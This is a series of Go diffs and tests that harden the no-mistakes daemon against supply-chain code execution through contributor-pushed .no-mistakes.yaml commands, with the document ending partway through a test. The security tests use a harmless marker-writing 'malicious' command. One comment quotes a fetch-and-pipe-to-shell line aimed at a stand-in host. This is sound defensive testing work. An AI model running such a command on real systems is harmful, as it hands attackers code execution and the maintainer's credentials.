+// TestLoadRepoFromBytes_AllowRepoCommands covers the trusted-bytes entry
+// point (the path loadTrustedRepoConfig uses after reading origin/<default>).
+func TestLoadRepoFromBytes_AllowRepoCommands(t *testing.T) {
+	cfg, err := LoadRepoFromBytes([]byte("allow_repo_commands: true\n"))
+	if err != nil {
+		t.Fatalf("unexpected error: %v", err)
+	}
+	if !cfg.AllowRepoCommands {
+		t.Errorf("AllowRepoCommands = false, want true")
+	}
+}
+
+// TestLoadGlobal_RejectsAllowRepoCommands proves the global config no longer
+// accepts allow_repo_commands (it was moved to per-repo trusted config so a
+// single global flip could not enable pushed-branch execution for every repo).
+func TestLoadGlobal_RejectsAllowRepoCommands(t *testing.T) {
+	dir := t.TempDir()
+	path := filepath.Join(dir, "config.yaml")
+	if err := os.WriteFile(path, []byte("agent: claude\nallow_repo_commands: true\n"), 0o644); err != nil {
+		t.Fatal(err)
+	}
+	if _, err := LoadGlobal(path); err == nil {
+		t.Fatal("expected error: allow_repo_commands must be rejected in global config (it is per-repo now)")
 	}
 }

--- a/internal/daemon/manager.go
+++ b/internal/daemon/manager.go
@@ -140,6 +140,43 @@ func branchFromRef(ref string) string {
 	return strings.TrimPrefix(ref, "refs/heads/")
 }
 
+// loadTrustedRepoConfig reads .no-mistakes.yaml from origin/<defaultBranch> in
+// the worktree (the trusted default-branch copy, freshly fetched in startRun)
+// and parses it. It returns nil when no trusted copy is available — because the
+// default branch is unknown, its ref is missing, or the file is absent on it —
+// so the caller (EffectiveRepoConfig) can fall back to the safe behavior of
+// empty commands. All failure modes are logged; none are fatal, since the
+// pushed-branch copy is still read for non-executing fields.
+func loadTrustedRepoConfig(ctx context.Context, wtDir, defaultBranch, runID string) *config.RepoConfig {
+	if defaultBranch == "" {
+		return nil
+	}
+	ref := "origin/" + defaultBranch
+	exists, err := git.RefExists(ctx, wtDir, ref)
+	if err != nil {
+		slog.Warn("trusted repo config: could not verify default branch ref", "run_id", runID, "ref", ref, "error", err)
+		return nil
+	}
+	if !exists {
+		slog.Warn("trusted repo config: default branch ref not available; commands from pushed branch will be disabled", "run_id", runID, "ref", ref)
+		return nil
+	}
+	content, err := git.ShowFile(ctx, wtDir, ref, ".no-mistakes.yaml")
+	if err != nil {
+		// Path absent on the default branch is the common "repo has no trusted
+		// commands" case; log at debug so it isn't noisy. Other errors are
+		// surfaced at warn so a genuinely broken fetch isn't silent.
+		slog.Debug("trusted repo config: not present on default branch", "run_id", runID, "ref", ref, "error", err)
+		return nil
+	}
+	trusted, err := config.LoadRepoFromBytes([]byte(content))
+	if err != nil {
+		slog.Warn("trusted repo config: parse failed; commands from pushed branch will be disabled", "run_id", runID, "ref", ref, "error", err)
+		return nil
+	}
+	return trusted
+}
+
 // HandlePushReceived processes a push notification from the post-receive hook.
 // It creates a run, sets up a worktree, and launches pipeline execution in the background.
 func (m *RunManager) HandlePushReceived(ctx context.Context, params *ipc.PushReceivedParams) (string, error) {
@@ -309,7 +346,26 @@ func (m *RunManager) startRun(ctx context.Context, repo *db.Repo, branch, headSH
 		trackStartFailure("load_repo_config")
 		return "", fmt.Errorf("load repo config: %w", err)
 	}
-	cfg := config.Merge(globalCfg, repoCfg)
+	// SECURITY: load the code-executing fields (commands.*) from the trusted
+	// default-branch copy of .no-mistakes.yaml rather than the pushed SHA. The
+	// worktree is checked out at headSHA (the contributor's branch), so reading
+	// repoCfg above would honor a contributor's commands and let any pushed SHA
+	// run arbitrary shell (sh -c) on the daemon host with the maintainer's env
+	// (GH_TOKEN, SSH agent, ...). EffectiveRepoConfig replaces Commands with the
+	// trusted default-branch values unless the maintainer has explicitly opted
+	// in via allow_repo_commands in global config. Non-executing fields stay on
+	// the pushed copy to preserve existing behavior.
+	trustedRepoCfg := loadTrustedRepoConfig(ctx, wtDir, repo.DefaultBranch, run.ID)
+	effectiveRepoCfg := config.EffectiveRepoConfig(repoCfg, trustedRepoCfg, globalCfg.AllowRepoCommands)
+	if globalCfg.AllowRepoCommands {
+		slog.Warn("allow_repo_commands is enabled: honoring commands from pushed branch", "run_id", run.ID, "branch", branch)
+	} else if repoCfg.Commands != effectiveRepoCfg.Commands {
+		// Surface the silent override so a maintainer who shipped a commands.*
+		// change on a feature branch understands why it did not run. This is
+		// not an error: it is the secure default in action.
+		slog.Info("repo commands loaded from default branch, not pushed branch", "run_id", run.ID, "branch", branch, "default_branch", repo.DefaultBranch)
+	}
+	cfg := config.Merge(globalCfg, effectiveRepoCfg)
 
 	// Create agent. In demo mode, skip resolution and use a no-op agent.
 	var ag agent.Agent

--- a/internal/daemon/manager.go
+++ b/internal/daemon/manager.go
@@ -140,38 +140,39 @@ func branchFromRef(ref string) string {
 	return strings.TrimPrefix(ref, "refs/heads/")
 }
 
-// loadTrustedRepoConfig reads .no-mistakes.yaml from origin/<defaultBranch> in
-// the worktree (the trusted default-branch copy, freshly fetched in startRun)
-// and parses it. It returns nil when no trusted copy is available — because the
-// default branch is unknown, its ref is missing, or the file is absent on it —
-// so the caller (EffectiveRepoConfig) can fall back to the safe behavior of
-// empty commands. All failure modes are logged; none are fatal, since the
-// pushed-branch copy is still read for non-executing fields.
-func loadTrustedRepoConfig(ctx context.Context, wtDir, defaultBranch, runID string) *config.RepoConfig {
-	if defaultBranch == "" {
+// loadTrustedRepoConfig reads .no-mistakes.yaml from the trusted
+// default-branch commit (trustedSHA — the exact SHA startRun just fetched and
+// resolved) in the worktree and parses it. Reading at a pinned SHA, rather
+// than the origin/<defaultBranch> remote-tracking ref, closes the stale-ref
+// hole: the gate worktree shares refs with the bare repo, so without a fresh
+// fetch + resolve the ref could point at a commit a previous run left behind.
+//
+// trustedSHA is empty when the default branch is unknown, the fetch failed,
+// or the ref did not resolve — every one of those failure modes returns nil
+// here so the caller (EffectiveRepoConfig) fails closed: the pushed branch's
+// commands and agent are dropped and the run proceeds on built-in defaults.
+// None of these are fatal, since the pushed-branch copy is still read for
+// non-executing fields.
+func loadTrustedRepoConfig(ctx context.Context, wtDir, trustedSHA, runID string) *config.RepoConfig {
+	if trustedSHA == "" {
+		// No trusted SHA means no freshly-fetched default-branch commit to
+		// read from. Return nil so EffectiveRepoConfig forces empty
+		// commands/agent — the secure default — instead of falling back to a
+		// potentially stale origin/<defaultBranch> ref.
 		return nil
 	}
-	ref := "origin/" + defaultBranch
-	exists, err := git.RefExists(ctx, wtDir, ref)
+	content, err := git.ShowFile(ctx, wtDir, trustedSHA, ".no-mistakes.yaml")
 	if err != nil {
-		slog.Warn("trusted repo config: could not verify default branch ref", "run_id", runID, "ref", ref, "error", err)
-		return nil
-	}
-	if !exists {
-		slog.Warn("trusted repo config: default branch ref not available; commands from pushed branch will be disabled", "run_id", runID, "ref", ref)
-		return nil
-	}
-	content, err := git.ShowFile(ctx, wtDir, ref, ".no-mistakes.yaml")
-	if err != nil {
-		// Path absent on the default branch is the common "repo has no trusted
-		// commands" case; log at debug so it isn't noisy. Other errors are
-		// surfaced at warn so a genuinely broken fetch isn't silent.
-		slog.Debug("trusted repo config: not present on default branch", "run_id", runID, "ref", ref, "error", err)
+		// Path absent on the default branch is the common "repo has no
+		// trusted commands" case; log at debug so it isn't noisy. Other
+		// errors are surfaced at warn so a genuinely broken read isn't
+		// silent. Either way trusted is nil → fail closed.
+		slog.Debug("trusted repo config: not present on default branch", "run_id", runID, "sha", trustedSHA, "error", err)
 		return nil
 	}
 	trusted, err := config.LoadRepoFromBytes([]byte(content))
 	if err != nil {
-		slog.Warn("trusted repo config: parse failed; commands from pushed branch will be disabled", "run_id", runID, "ref", ref, "error", err)
+		slog.Warn("trusted repo config: parse failed; commands/agent from pushed branch will be disabled", "run_id", runID, "sha", trustedSHA, "error", err)
 		return nil
 	}
 	return trusted
@@ -317,9 +318,23 @@ func (m *RunManager) startRun(ctx context.Context, repo *db.Repo, branch, headSH
 		trackStartFailure("configure_worktree_identity")
 		return "", fmt.Errorf("configure worktree git identity: %w", err)
 	}
+	// Fetch the trusted default branch and resolve it to an exact commit SHA
+	// before any read. Reading the trusted config at this pinned SHA (rather
+	// than the origin/<defaultBranch> remote-tracking ref) is what makes a
+	// fetch failure fail closed: if the fetch errors or the ref does not
+	// resolve, trustedSHA stays empty, loadTrustedRepoConfig returns nil, and
+	// EffectiveRepoConfig drops the pushed branch's commands/agent. Without
+	// the resolve, a stale origin/<defaultBranch> left in the shared bare
+	// repo by a previous run could serve a trusted copy that the live default
+	// branch has already removed — silently running stale shell.
+	var trustedSHA string
 	if repo.DefaultBranch != "" {
 		if err := git.FetchRemoteBranch(ctx, wtDir, "origin", repo.DefaultBranch); err != nil {
-			slog.Warn("failed to fetch default branch into worktree", "run_id", run.ID, "branch", repo.DefaultBranch, "error", err)
+			slog.Warn("failed to fetch default branch into worktree; trusted config disabled (commands/agent from pushed branch will be dropped)", "run_id", run.ID, "branch", repo.DefaultBranch, "error", err)
+		} else if sha, err := git.ResolveRef(ctx, wtDir, "refs/remotes/origin/"+repo.DefaultBranch); err != nil {
+			slog.Warn("failed to resolve fetched default-branch ref; trusted config disabled", "run_id", run.ID, "branch", repo.DefaultBranch, "error", err)
+		} else {
+			trustedSHA = sha
 		}
 	}
 
@@ -346,24 +361,30 @@ func (m *RunManager) startRun(ctx context.Context, repo *db.Repo, branch, headSH
 		trackStartFailure("load_repo_config")
 		return "", fmt.Errorf("load repo config: %w", err)
 	}
-	// SECURITY: load the code-executing fields (commands.*) from the trusted
-	// default-branch copy of .no-mistakes.yaml rather than the pushed SHA. The
-	// worktree is checked out at headSHA (the contributor's branch), so reading
-	// repoCfg above would honor a contributor's commands and let any pushed SHA
-	// run arbitrary shell (sh -c) on the daemon host with the maintainer's env
-	// (GH_TOKEN, SSH agent, ...). EffectiveRepoConfig replaces Commands with the
-	// trusted default-branch values unless the maintainer has explicitly opted
-	// in via allow_repo_commands in global config. Non-executing fields stay on
-	// the pushed copy to preserve existing behavior.
-	trustedRepoCfg := loadTrustedRepoConfig(ctx, wtDir, repo.DefaultBranch, run.ID)
-	effectiveRepoCfg := config.EffectiveRepoConfig(repoCfg, trustedRepoCfg, globalCfg.AllowRepoCommands)
-	if globalCfg.AllowRepoCommands {
-		slog.Warn("allow_repo_commands is enabled: honoring commands from pushed branch", "run_id", run.ID, "branch", branch)
-	} else if repoCfg.Commands != effectiveRepoCfg.Commands {
+	// SECURITY: load the code-executing selection fields (commands.* and
+	// agent) from the trusted default-branch copy of .no-mistakes.yaml rather
+	// than the pushed SHA. The worktree is checked out at headSHA (the
+	// contributor's branch), so reading repoCfg above would honor a
+	// contributor's commands/agent and let any pushed SHA run arbitrary shell
+	// (sh -c) or pick the launched agent (incl. acp: targets) on the daemon
+	// host with the maintainer's env (GH_TOKEN, SSH agent, ...).
+	// EffectiveRepoConfig replaces commands + agent with the trusted
+	// default-branch values unless the maintainer has explicitly opted in.
+	//
+	// allow_repo_commands is itself read ONLY from the trusted copy: a
+	// contributor cannot self-enable it from the pushed branch. With no
+	// trusted copy (fetch failed, no default branch, or no file on it) the
+	// opt-in is false and commands/agent are forced empty — fail closed.
+	trustedRepoCfg := loadTrustedRepoConfig(ctx, wtDir, trustedSHA, run.ID)
+	allowRepoCommands := trustedRepoCfg != nil && trustedRepoCfg.AllowRepoCommands
+	effectiveRepoCfg := config.EffectiveRepoConfig(repoCfg, trustedRepoCfg, allowRepoCommands)
+	if allowRepoCommands {
+		slog.Warn("allow_repo_commands is enabled on the default branch: honoring commands/agent from pushed branch", "run_id", run.ID, "branch", branch)
+	} else if repoCfg.Commands != effectiveRepoCfg.Commands || repoCfg.Agent != effectiveRepoCfg.Agent {
 		// Surface the silent override so a maintainer who shipped a commands.*
-		// change on a feature branch understands why it did not run. This is
-		// not an error: it is the secure default in action.
-		slog.Info("repo commands loaded from default branch, not pushed branch", "run_id", run.ID, "branch", branch, "default_branch", repo.DefaultBranch)
+		// or agent change on a feature branch understands why it did not run.
+		// This is not an error: it is the secure default in action.
+		slog.Info("repo commands/agent loaded from default branch, not pushed branch", "run_id", run.ID, "branch", branch, "default_branch", repo.DefaultBranch)
 	}
 	cfg := config.Merge(globalCfg, effectiveRepoCfg)
 

--- a/internal/daemon/manager_trust_test.go
+++ b/internal/daemon/manager_trust_test.go
@@ -1,0 +1,159 @@
+package daemon
+
+import (
+	"context"
+	"os"
+	"path/filepath"
+	"testing"
+
+	"github.com/kunchenguid/no-mistakes/internal/config"
+	"github.com/kunchenguid/no-mistakes/internal/git"
+)
+
+// TestLoadTrustedRepoConfig_FailClosedOnFetchFailure is the regression test for
+// the supply-chain RCE review item #1: when the default-branch fetch fails,
+// startRun passes an empty trustedSHA, and loadTrustedRepoConfig MUST return
+// nil even though a (potentially stale) origin/<default> ref is still present
+// in the worktree's shared refs. Reading that stale ref would run a command
+// the live default branch has already removed. EffectiveRepoConfig then forces
+// empty commands, so the stale command does not run.
+func TestLoadTrustedRepoConfig_FailClosedOnFetchFailure(t *testing.T) {
+	ctx := context.Background()
+
+	// Source repo whose default branch carries a "stale" lint command — the
+	// kind of command a maintainer has since removed but a stale ref would
+	// still serve.
+	src := filepath.Join(t.TempDir(), "src")
+	if err := os.MkdirAll(src, 0o755); err != nil {
+		t.Fatal(err)
+	}
+	gitCmd(t, src, "init", "--initial-branch=main")
+	gitCmd(t, src, "config", "user.email", "test@test.com")
+	gitCmd(t, src, "config", "user.name", "Test")
+	gitCmd(t, src, "config", "commit.gpgsign", "false")
+	if err := os.WriteFile(filepath.Join(src, "README.md"), []byte("# test\n"), 0o644); err != nil {
+		t.Fatal(err)
+	}
+	if err := os.WriteFile(filepath.Join(src, ".no-mistakes.yaml"),
+		[]byte("commands:\n  lint: \"echo stale-command\"\n"), 0o644); err != nil {
+		t.Fatal(err)
+	}
+	gitCmd(t, src, "add", ".")
+	gitCmd(t, src, "commit", "-m", "stale command on default branch")
+
+	bare := filepath.Join(t.TempDir(), "bare.git")
+	gitCmd(t, "", "init", "--bare", bare)
+	// The gate bare repo is its own origin so the linked worktree can fetch
+	// main exactly the way startRun does.
+	if err := git.AddRemote(ctx, bare, "origin", bare); err != nil {
+		t.Fatalf("add origin to bare: %v", err)
+	}
+	gitCmd(t, src, "remote", "add", "origin", bare)
+	gitCmd(t, src, "push", "origin", "HEAD:refs/heads/main")
+
+	// Linked worktree sharing the bare repo's refs and config.
+	wt := filepath.Join(t.TempDir(), "wt")
+	headSHA := gitOutput(t, src, "rev-parse", "HEAD")
+	if err := git.WorktreeAdd(ctx, bare, wt, headSHA); err != nil {
+		t.Fatalf("WorktreeAdd: %v", err)
+	}
+
+	// A previous successful fetch left origin/main present in the shared
+	// refs — this is the stale ref the old code read after a fetch failure.
+	if err := git.FetchRemoteBranch(ctx, wt, "origin", "main"); err != nil {
+		t.Fatalf("prime origin/main: %v", err)
+	}
+	ok, err := git.RefExists(ctx, wt, "origin/main")
+	if err != nil {
+		t.Fatalf("RefExists origin/main: %v", err)
+	}
+	if !ok {
+		t.Fatal("precondition failed: origin/main should be present (the stale ref)")
+	}
+
+	// THE REGRESSION: fetch "failed" → startRun passes an empty trustedSHA.
+	// Even with origin/main present and carrying the stale command, the
+	// trusted config must be nil so the stale command cannot run.
+	got := loadTrustedRepoConfig(ctx, wt, "", "test-run")
+	if got != nil {
+		t.Fatalf("expected nil trusted config on empty SHA (fetch failure); got commands.lint=%q", got.Commands.Lint)
+	}
+
+	// And the effective config drops the pushed-branch command too — the
+	// secure default, not a fallback to a stale or hostile copy.
+	pushed := &config.RepoConfig{Commands: config.Commands{Lint: "echo pushed-branch-command"}}
+	eff := config.EffectiveRepoConfig(pushed, got, false)
+	if eff.Commands.Lint != "" {
+		t.Fatalf("SECURITY REGRESSION: command would run after fetch failure: %q", eff.Commands.Lint)
+	}
+}
+
+// TestLoadTrustedRepoConfig_PinnedSHAReadsFreshDefaultBranch proves the
+// complementary side of review item #1: when the fetch succeeds, the trusted
+// config is read at the exact resolved SHA (not the origin/<default> ref
+// name), so it reflects the freshly fetched default-branch tip rather than a
+// stale ref value. Advancing the default branch and re-fetching must yield the
+// new command, not the old one.
+func TestLoadTrustedRepoConfig_PinnedSHAReadsFreshDefaultBranch(t *testing.T) {
+	ctx := context.Background()
+
+	src := filepath.Join(t.TempDir(), "src")
+	if err := os.MkdirAll(src, 0o755); err != nil {
+		t.Fatal(err)
+	}
+	gitCmd(t, src, "init", "--initial-branch=main")
+	gitCmd(t, src, "config", "user.email", "test@test.com")
+	gitCmd(t, src, "config", "user.name", "Test")
+	gitCmd(t, src, "config", "commit.gpgsign", "false")
+	if err := os.WriteFile(filepath.Join(src, "README.md"), []byte("# test\n"), 0o644); err != nil {
+		t.Fatal(err)
+	}
+	if err := os.WriteFile(filepath.Join(src, ".no-mistakes.yaml"),
+		[]byte("commands:\n  lint: \"echo stale-A\"\n"), 0o644); err != nil {
+		t.Fatal(err)
+	}
+	gitCmd(t, src, "add", ".")
+	gitCmd(t, src, "commit", "-m", "stale command A")
+	staleSHA := gitOutput(t, src, "rev-parse", "HEAD")
+
+	bare := filepath.Join(t.TempDir(), "bare.git")
+	gitCmd(t, "", "init", "--bare", bare)
+	if err := git.AddRemote(ctx, bare, "origin", bare); err != nil {
+		t.Fatalf("add origin to bare: %v", err)
+	}
+	gitCmd(t, src, "remote", "add", "origin", bare)
+	gitCmd(t, src, "push", "origin", "HEAD:refs/heads/main")
+
+	// Advance the default branch to a fresh command and push.
+	if err := os.WriteFile(filepath.Join(src, ".no-mistakes.yaml"),
+		[]byte("commands:\n  lint: \"echo fresh-B\"\n"), 0o644); err != nil {
+		t.Fatal(err)
+	}
+	gitCmd(t, src, "add", ".")
+	gitCmd(t, src, "commit", "-m", "fresh command B")
+	gitCmd(t, src, "push", "origin", "HEAD:refs/heads/main")
+	freshSHA := gitOutput(t, src, "rev-parse", "HEAD")
+
+	wt := filepath.Join(t.TempDir(), "wt")
+	if err := git.WorktreeAdd(ctx, bare, wt, staleSHA); err != nil {
+		t.Fatalf("WorktreeAdd: %v", err)
+	}
+	if err := git.FetchRemoteBranch(ctx, wt, "origin", "main"); err != nil {
+		t.Fatalf("fetch main: %v", err)
+	}
+	resolved, err := git.ResolveRef(ctx, wt, "refs/remotes/origin/main")
+	if err != nil {
+		t.Fatalf("resolve origin/main: %v", err)
+	}
+	if resolved != freshSHA {
+		t.Fatalf("resolved SHA %s != fresh default-branch tip %s", resolved, freshSHA)
+	}
+
+	trusted := loadTrustedRepoConfig(ctx, wt, resolved, "test-run")
+	if trusted == nil {
+		t.Fatal("expected trusted config at the pinned fresh SHA")
+	}
+	if trusted.Commands.Lint != "echo fresh-B" {
+		t.Fatalf("trusted lint = %q, want fresh-B (read at pinned SHA, not stale ref)", trusted.Commands.Lint)
+	}
+}

--- a/internal/e2e/harness.go
+++ b/internal/e2e/harness.go
@@ -56,13 +56,14 @@ type SetupOpts struct {
 	// fake agent uses its built-in clean-response default.
 	Scenario string
 
-	// AllowRepoCommands controls the global-config allow_repo_commands
-	// opt-in. The harness models a trusted single-developer environment
-	// (the same user owns the working clone, gate, and daemon), so it
-	// defaults to true: feature-branch commands run as before. Tests that
-	// verify the supply-chain hardening (commands must come from the
-	// trusted default branch) pass a pointer to false to exercise the
-	// secure default.
+	// AllowRepoCommands controls the per-repo allow_repo_commands opt-in
+	// committed to the trusted default-branch .no-mistakes.yaml (never the
+	// global config, and never the pushed branch). The harness models a
+	// trusted single-developer environment (the same user owns the working
+	// clone, gate, and daemon), so it defaults to true: feature-branch
+	// commands run as before. Tests that verify the supply-chain hardening
+	// (commands must come from the trusted default branch) pass a pointer
+	// to false to exercise the secure default.
 	AllowRepoCommands *bool
 }
 
@@ -166,17 +167,8 @@ func (h *Harness) writeGlobalConfig() {
 		h.t.Fatalf("mkdir nm home: %v", err)
 	}
 	binLink := filepath.Join(h.BinDir, h.agentName)
-	// allow_repo_commands defaults to true: the harness models a trusted
-	// single-developer environment where the same user owns every branch,
-	// so honoring feature-branch commands matches prior behavior. Security
-	// tests override this via SetupOpts.AllowRepoCommands = false.
-	allowRepoCommands := true
-	if h.allowRepoCommands != nil {
-		allowRepoCommands = *h.allowRepoCommands
-	}
 	cfg := fmt.Sprintf(`agent: %s
 log_level: debug
-allow_repo_commands: %t
 agent_path_override:
   %s: %s
 auto_fix:
@@ -186,7 +178,7 @@ auto_fix:
   review: 0
   document: 0
   ci: 0
-`, h.agentName, allowRepoCommands, h.agentName, binLink)
+`, h.agentName, h.agentName, binLink)
 	if err := os.WriteFile(configPath, []byte(cfg), 0o644); err != nil {
 		h.t.Fatalf("write config: %v", err)
 	}
@@ -224,8 +216,18 @@ func (h *Harness) initGitRepos() {
 	if err := os.WriteFile(readme, []byte("# e2e\n"), 0o644); err != nil {
 		h.t.Fatalf("write readme: %v", err)
 	}
+	// allow_repo_commands is committed to the trusted default-branch copy of
+	// .no-mistakes.yaml (never global, never the pushed branch). The harness
+	// models a trusted single-developer environment where the same user owns
+	// every branch, so it defaults to true: feature-branch commands run as
+	// before. Security tests override via SetupOpts.AllowRepoCommands = false.
+	allowRepoCommands := true
+	if h.allowRepoCommands != nil {
+		allowRepoCommands = *h.allowRepoCommands
+	}
 	repoConfig := filepath.Join(h.WorkDir, ".no-mistakes.yaml")
-	if err := os.WriteFile(repoConfig, []byte("ignore_patterns:\n  - '*.generated.go'\n  - 'vendor/**'\n"), 0o644); err != nil {
+	repoCfg := fmt.Sprintf("ignore_patterns:\n  - '*.generated.go'\n  - 'vendor/**'\nallow_repo_commands: %t\n", allowRepoCommands)
+	if err := os.WriteFile(repoConfig, []byte(repoCfg), 0o644); err != nil {
 		h.t.Fatalf("write repo config: %v", err)
 	}
 	mustGit(h.WorkDir, "add", "README.md", ".no-mistakes.yaml")

--- a/internal/e2e/harness.go
+++ b/internal/e2e/harness.go
@@ -40,7 +40,8 @@ type Harness struct {
 	AgentLog    string // every fake-agent invocation appended here, one JSON per line
 	Scenario    string // optional path to a scenario yaml; empty = built-in default
 
-	agentName string // claude / codex / opencode
+	agentName         string // claude / codex / opencode
+	allowRepoCommands *bool  // mirrors SetupOpts.AllowRepoCommands
 }
 
 // SetupOpts controls per-test setup.
@@ -54,6 +55,15 @@ type SetupOpts struct {
 	// Scenario is an optional path to a YAML scenario file. If empty the
 	// fake agent uses its built-in clean-response default.
 	Scenario string
+
+	// AllowRepoCommands controls the global-config allow_repo_commands
+	// opt-in. The harness models a trusted single-developer environment
+	// (the same user owns the working clone, gate, and daemon), so it
+	// defaults to true: feature-branch commands run as before. Tests that
+	// verify the supply-chain hardening (commands must come from the
+	// trusted default branch) pass a pointer to false to exercise the
+	// secure default.
+	AllowRepoCommands *bool
 }
 
 const e2eDaemonStartTimeout = "45s"
@@ -72,17 +82,18 @@ func NewHarness(t *testing.T, opts SetupOpts) *Harness {
 
 	root := t.TempDir()
 	h := &Harness{
-		t:           t,
-		NMBin:       nmBin,
-		FakeAgent:   fakeBin,
-		BinDir:      filepath.Join(root, "bin"),
-		NMHome:      filepath.Join(root, "nmhome"),
-		HomeDir:     filepath.Join(root, "home"),
-		UpstreamDir: filepath.Join(root, "upstream.git"),
-		WorkDir:     filepath.Join(root, "work"),
-		AgentLog:    filepath.Join(root, "fakeagent.log"),
-		Scenario:    opts.Scenario,
-		agentName:   opts.Agent,
+		t:                 t,
+		NMBin:             nmBin,
+		FakeAgent:         fakeBin,
+		BinDir:            filepath.Join(root, "bin"),
+		NMHome:            filepath.Join(root, "nmhome"),
+		HomeDir:           filepath.Join(root, "home"),
+		UpstreamDir:       filepath.Join(root, "upstream.git"),
+		WorkDir:           filepath.Join(root, "work"),
+		AgentLog:          filepath.Join(root, "fakeagent.log"),
+		Scenario:          opts.Scenario,
+		agentName:         opts.Agent,
+		allowRepoCommands: opts.AllowRepoCommands,
 	}
 
 	for _, dir := range []string{h.BinDir, h.NMHome, h.HomeDir, h.WorkDir} {
@@ -155,8 +166,17 @@ func (h *Harness) writeGlobalConfig() {
 		h.t.Fatalf("mkdir nm home: %v", err)
 	}
 	binLink := filepath.Join(h.BinDir, h.agentName)
+	// allow_repo_commands defaults to true: the harness models a trusted
+	// single-developer environment where the same user owns every branch,
+	// so honoring feature-branch commands matches prior behavior. Security
+	// tests override this via SetupOpts.AllowRepoCommands = false.
+	allowRepoCommands := true
+	if h.allowRepoCommands != nil {
+		allowRepoCommands = *h.allowRepoCommands
+	}
 	cfg := fmt.Sprintf(`agent: %s
 log_level: debug
+allow_repo_commands: %t
 agent_path_override:
   %s: %s
 auto_fix:
@@ -166,7 +186,7 @@ auto_fix:
   review: 0
   document: 0
   ci: 0
-`, h.agentName, h.agentName, binLink)
+`, h.agentName, allowRepoCommands, h.agentName, binLink)
 	if err := os.WriteFile(configPath, []byte(cfg), 0o644); err != nil {
 		h.t.Fatalf("write config: %v", err)
 	}

--- a/internal/e2e/repo_config_security_test.go
+++ b/internal/e2e/repo_config_security_test.go
@@ -1,0 +1,99 @@
+//go:build e2e
+
+package e2e
+
+import (
+	"fmt"
+	"os"
+	"path/filepath"
+	"testing"
+	"time"
+
+	"github.com/kunchenguid/no-mistakes/internal/types"
+)
+
+// TestRepoConfigCommandsFromDefaultBranch proves the supply-chain RCE fix
+// (audit finding #1): the code-executing fields commands.* are loaded from the
+// trusted default-branch copy of .no-mistakes.yaml, never from a contributor's
+// pushed SHA. A feature branch ships a malicious lint command that writes a
+// marker file; under the secure default the marker must never appear, while an
+// explicit allow_repo_commands opt-in must run it — so the assertion is known
+// to be meaningful rather than testing a no-op.
+func TestRepoConfigCommandsFromDefaultBranch(t *testing.T) {
+	t.Run("blocked_by_default", func(t *testing.T) {
+		optOut := false
+		h := NewHarness(t, SetupOpts{Agent: "claude", Scenario: cleanReviewScenario(t), AllowRepoCommands: &optOut})
+
+		if out, err := h.Run("init"); err != nil {
+			t.Fatalf("nm init: %v\n%s", err, out)
+		}
+
+		markerPath := pushMaliciousRepoConfig(t, h, "rce-blocked")
+
+		run := h.WaitForRun("rce-blocked", 90*time.Second)
+		if run.Status != types.RunCompleted {
+			t.Fatalf("run did not complete: status=%s error=%v", run.Status, deref(run.Error))
+		}
+
+		if _, err := os.Stat(markerPath); err == nil {
+			t.Fatalf("SECURITY REGRESSION: pushed-branch lint command executed (marker %s exists); commands.* must be loaded from the trusted default branch, not the pushed SHA", markerPath)
+		}
+
+		// Sanity: the lint step ran (it delegated to the agent because the
+		// trusted default branch has no lint command) and reached a terminal
+		// status, so the absence of the marker is a real result rather than a
+		// pipeline that never got to lint.
+		lintStep, ok := findStep(run.Steps, types.StepLint)
+		if !ok {
+			t.Fatalf("lint step missing from run results")
+		}
+		switch lintStep.Status {
+		case types.StepStatusCompleted, types.StepStatusSkipped, types.StepStatusFailed:
+		default:
+			t.Fatalf("lint step did not reach a terminal status: %s", lintStep.Status)
+		}
+	})
+
+	t.Run("executes_when_opted_in", func(t *testing.T) {
+		// Same attack payload, but the maintainer has explicitly opted in via
+		// allow_repo_commands. The pushed-branch command MUST run, proving the
+		// marker check above is a meaningful guard against regressions.
+		optIn := true
+		h := NewHarness(t, SetupOpts{Agent: "claude", Scenario: cleanReviewScenario(t), AllowRepoCommands: &optIn})
+
+		if out, err := h.Run("init"); err != nil {
+			t.Fatalf("nm init: %v\n%s", err, out)
+		}
+
+		markerPath := pushMaliciousRepoConfig(t, h, "rce-optin")
+
+		run := h.WaitForRun("rce-optin", 90*time.Second)
+		// The opt-in run may complete or fail depending on later steps; either
+		// way the lint payload must have executed. Guard with a clear message.
+		if _, err := os.Stat(markerPath); err != nil {
+			t.Fatalf("opt-in run should have executed the pushed-branch lint command (marker %s missing); run status=%s err=%v", markerPath, run.Status, deref(run.Error))
+		}
+	})
+}
+
+// pushMaliciousRepoConfig creates a feature branch carrying a hostile
+// .no-mistakes.yaml whose lint command writes a marker file, pushes it through
+// the gate, and returns the marker path the test should assert on. The
+// default-branch .no-mistakes.yaml (written by the harness) carries no
+// commands, so it is the trusted source and yields empty commands under the
+// secure default.
+func pushMaliciousRepoConfig(t *testing.T, h *Harness, branch string) string {
+	t.Helper()
+	markerPath := filepath.Join(t.TempDir(), "pwned")
+
+	// A real change so rebase has a non-empty diff.
+	h.CommitChange(branch, branch+".txt", "change to gate\n", "add "+branch+" change")
+
+	// The malicious payload: in the wild this would be
+	// "curl evil.example/p.sh | sh". Here it writes a marker the test can see.
+	maliciousConfig := fmt.Sprintf("ignore_patterns:\n  - 'vendor/**'\ncommands:\n  lint: \"echo pwned > %s\"\n", markerPath)
+	h.CommitChange(branch, ".no-mistakes.yaml", maliciousConfig, "configure malicious lint command")
+
+	h.PushToGate(branch)
+	return markerPath
+}

--- a/internal/e2e/repo_config_security_test.go
+++ b/internal/e2e/repo_config_security_test.go
@@ -74,6 +74,39 @@ func TestRepoConfigCommandsFromDefaultBranch(t *testing.T) {
 			t.Fatalf("opt-in run should have executed the pushed-branch lint command (marker %s missing); run status=%s err=%v", markerPath, run.Status, deref(run.Error))
 		}
 	})
+
+	t.Run("pushed_branch_cannot_self_enable", func(t *testing.T) {
+		// Hard requirement of the per-repo move: allow_repo_commands is read
+		// ONLY from the trusted default-branch copy, never the pushed SHA. A
+		// contributor who sets allow_repo_commands: true on their feature
+		// branch alongside a hostile command MUST NOT self-enable — the
+		// trusted default branch says false, so the command is dropped.
+		optOut := false
+		h := NewHarness(t, SetupOpts{Agent: "claude", Scenario: cleanReviewScenario(t), AllowRepoCommands: &optOut})
+
+		if out, err := h.Run("init"); err != nil {
+			t.Fatalf("nm init: %v\n%s", err, out)
+		}
+
+		markerPath := filepath.Join(t.TempDir(), "pwned")
+		branch := "rce-self-enable"
+		h.CommitChange(branch, branch+".txt", "change to gate\n", "add "+branch+" change")
+		// The contributor tries to flip the opt-in on AND ship a hostile
+		// command in the same pushed copy. Both must be ignored: the trusted
